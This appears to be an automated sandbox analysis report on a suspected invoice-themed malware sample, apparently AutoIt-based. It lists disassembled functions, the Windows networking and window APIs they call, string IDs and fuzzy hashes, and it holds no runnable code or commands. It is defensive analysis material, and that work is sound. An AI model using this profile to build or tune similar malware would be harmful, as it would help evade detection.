                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • __wcsnicmp.LIBCMT ref: 00F3B02D
                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F3B0F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                            • String ID: LPT
                                                                            • API String ID: 3222508074-1350329615
                                                                            • Opcode ID: 765b4cf23bc15b177158a0a1a381f7beca90436597e00fc49930167f50612d22
                                                                            • Instruction ID: e12993cd890b8f578abb79a956b041e2bad07b8e4af3909ad82c2bf0436ea8cc
                                                                            • Opcode Fuzzy Hash: 765b4cf23bc15b177158a0a1a381f7beca90436597e00fc49930167f50612d22
                                                                            • Instruction Fuzzy Hash: 84617576E00219AFCB18EF94C861EAEB7F4EF08720F15405AFA16AB351D770AE45DB50
                                                                            Function 00EE2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 00EE2968
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00EE2981
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: cca05cee1cc02c096858460729e95ee3a7ae6e44f544e60ec642de37de34ca9b
                                                                            • Instruction ID: 69df759636cb73ab499763e505d5a49703ffa5e2eb82217886d48ec4e07506d2
                                                                            • Opcode Fuzzy Hash: cca05cee1cc02c096858460729e95ee3a7ae6e44f544e60ec642de37de34ca9b
                                                                            • Instruction Fuzzy Hash: 3C5136714087489BD320AF10DC86BAFBBF8FB85344F41885EF2D8511A2DB319569DB67
                                                                            Function 00F39734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED4F0B: __fread_nolock.LIBCMT ref: 00ED4F29
                                                                            • _wcscmp.LIBCMT ref: 00F39824
                                                                            • _wcscmp.LIBCMT ref: 00F39837
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$__fread_nolock
                                                                            • String ID: FILE
                                                                            • API String ID: 4029003684-3121273764
                                                                            • Opcode ID: a6c385a4dd274e8a840e3be214b7afa49aceffb6e8ecb8e0eba35bd0ee5d5e60
                                                                            • Instruction ID: 978b6937917405befc573f091a469fba8e53db46b550f8dd79806d6a39bdfd2d
                                                                            • Opcode Fuzzy Hash: a6c385a4dd274e8a840e3be214b7afa49aceffb6e8ecb8e0eba35bd0ee5d5e60
                                                                            • Instruction Fuzzy Hash: BB41B671A04209BBDF21ABA0CC45FEFBBFDDF85720F40046AF904B7291DAB199059B61
                                                                            Function 00F4258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F4259E
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F425D4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset
                                                                            • String ID: |
                                                                            • API String ID: 1413715105-2343686810
                                                                            • Opcode ID: 0e181c98762bc3d816b1c295ea555e3f6d264f043703704bb299f202383527f2
                                                                            • Instruction ID: e0d88f2ce3295bc0d101b4d9ec2e3af6976ea743634f99c65a6677ba0edd9bb1
                                                                            • Opcode Fuzzy Hash: 0e181c98762bc3d816b1c295ea555e3f6d264f043703704bb299f202383527f2
                                                                            • Instruction Fuzzy Hash: 95310371801219AFCF01AFA4CC85EEEBFB8FF08350F10106AFD14B6262EA315956DB60
                                                                            Function 00F57A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F57B61
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F57B76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 46a0b6e2bc1fa9f65a44b67de2e3313294e73154cf8fe71773d68b71bd47199d
                                                                            • Instruction ID: af3c045c93ae468acefb5b85dd6b909ddb3981ca73f505e12c9d38986b060114
                                                                            • Opcode Fuzzy Hash: 46a0b6e2bc1fa9f65a44b67de2e3313294e73154cf8fe71773d68b71bd47199d
                                                                            • Instruction Fuzzy Hash: 1A412875A04309AFDB14DF65D880BDABBB5FB08301F10016AEE04EB395D730AA45DF90
                                                                            Function 00F56A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00F56B17
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F56B53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: f336a5504d4cca610695556752b95167d1dbc621c7f5b8a385761037b32b0083
                                                                            • Instruction ID: 8d74c29df0208956c7c14c5568b71b8dbfe79210150bc41b92434889a725f3d9
                                                                            • Opcode Fuzzy Hash: f336a5504d4cca610695556752b95167d1dbc621c7f5b8a385761037b32b0083
                                                                            • Instruction Fuzzy Hash: 1E31B071200608AEDB109F64CC40BFB77A9FF88721F509519FEA5D3190DA34AC86EB60
                                                                            Function 00F328A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F32911
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F3294C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: 10e8d6ace885cfc47104fbd404cc7abc4ddbe67d75ef713ffcc0dd19ff73ed30
                                                                            • Instruction ID: 9e454f77918f958375ef3acefaa4a73934a08aa4eb11ee277ca21e0805ac6537
                                                                            • Opcode Fuzzy Hash: 10e8d6ace885cfc47104fbd404cc7abc4ddbe67d75ef713ffcc0dd19ff73ed30
                                                                            • Instruction Fuzzy Hash: 6A31C131A01309DFEB65CF58CC85BAEBBF8EF45370F140029E985A61A1D7709944FB51
                                                                            Function 00F439E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 00F43A66
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf_memmove
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 3506404897-2584243854
                                                                            • Opcode ID: 0bd9f142d1b3d982005926e60d6ad4f87c7bc75e57608b6eab368f3ce57b3c0c
                                                                            • Instruction ID: addeb3b91b823bbefa07ad07d8c0209823f7ab873800ce778a706cb58bc273cc
                                                                            • Opcode Fuzzy Hash: 0bd9f142d1b3d982005926e60d6ad4f87c7bc75e57608b6eab368f3ce57b3c0c
                                                                            • Instruction Fuzzy Hash: AE218135640219AFCF10EF64CC82AAE7BF5EF44700F500455E955BB282DB34EA46DB61
                                                                            Function 00F566D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F56761
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F5676C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 45388623ffb877c9e8000e4ae8c1b8e352716a2cd48a31120fd387b6aae403d1
                                                                            • Instruction ID: bd057b7ea061ea286af0167be6f6ea53be829d96a37423ca608a0831a3dba085
                                                                            • Opcode Fuzzy Hash: 45388623ffb877c9e8000e4ae8c1b8e352716a2cd48a31120fd387b6aae403d1
                                                                            • Instruction Fuzzy Hash: 3A11B6716002086FEF159F54DC80EBB3B6AEB48369F510125FE24D7290DA75DC55A7A0
                                                                            Function 00F56C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ED1D73
                                                                              • Part of subcall function 00ED1D35: GetStockObject.GDI32(00000011), ref: 00ED1D87
                                                                              • Part of subcall function 00ED1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED1D91
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F56C71
                                                                            • GetSysColor.USER32(00000012), ref: 00F56C8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: 88f46029cf078fa71ba45bcd9dcb0a770a63bdb80370c6061ddfe130de846841
                                                                            • Instruction ID: 9d9a0cc82450e6c54bd9add87b151defd964c51c66b0ade0548973f420e4bffe
                                                                            • Opcode Fuzzy Hash: 88f46029cf078fa71ba45bcd9dcb0a770a63bdb80370c6061ddfe130de846841
                                                                            • Instruction Fuzzy Hash: 74215972910209AFDF04DFA8CC45AEA7BA9FB08316F004629FE95D3250E735E854EB60
                                                                            Function 00F56920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00F569A2
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F569B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            • Opcode ID: 25162469fb2297c9fe5e63a7194c49def76d5836086a3a03a5be6f243f42ce0f
                                                                            • Instruction ID: 675519ead533e26a12a600fb51bb3c76172ac77ba0ca93d4ecee6ac4dc7a4c44
                                                                            • Opcode Fuzzy Hash: 25162469fb2297c9fe5e63a7194c49def76d5836086a3a03a5be6f243f42ce0f
                                                                            • Instruction Fuzzy Hash: 66115871900208ABEB108E649C40AAB37A9EB053B6F904624FEB5D71E0C635DC59A760
                                                                            Function 00F329AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F32A22
                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F32A41
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: 4102c9278e9bada67754726dfd772ee4d29f64af93c61d25b2af42eab7a57be2
                                                                            • Instruction ID: 5149573e93476f3d05c4c01570b98e4a09599ca25ee7a2697977474d7fe3132e
                                                                            • Opcode Fuzzy Hash: 4102c9278e9bada67754726dfd772ee4d29f64af93c61d25b2af42eab7a57be2
                                                                            • Instruction Fuzzy Hash: 90110832D01118ABDF71DF58DC44BAA73B8AB46330F244021E995E72A0D734AD0AF791
                                                                            Function 00F421D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F4222C
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F42255
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: 51e8b740bffa7d2e651a0811a3a909e2a212061c7407db45227e472e52e6fd6c
                                                                            • Instruction ID: c30176fd5841cfbfe905cdaff67fab97d76906d916da2d01dff0c01e2564c367
                                                                            • Opcode Fuzzy Hash: 51e8b740bffa7d2e651a0811a3a909e2a212061c7407db45227e472e52e6fd6c
                                                                            • Instruction Fuzzy Hash: A711E370901225BAEB248F118C84FB7FFA8FF06361F50823AFE0586000D3B05A84E6F0
                                                                            Function 00F28E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F28E73
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 750c954a30845b38f25ba4af42b1c5d6187f9ff4ccaf1d7a8076c5100325b401
                                                                            • Instruction ID: 96d7191a642a0a15ffcd74f0546302b34b4150547127bd48a1fed8c2c1d228a2
                                                                            • Opcode Fuzzy Hash: 750c954a30845b38f25ba4af42b1c5d6187f9ff4ccaf1d7a8076c5100325b401
                                                                            • Instruction Fuzzy Hash: 2D01F572A02229AB8B14FBE4CC519FE73A9EF02360B10061AB871673E1EE355809E650
                                                                            Function 00F28CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F28D6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
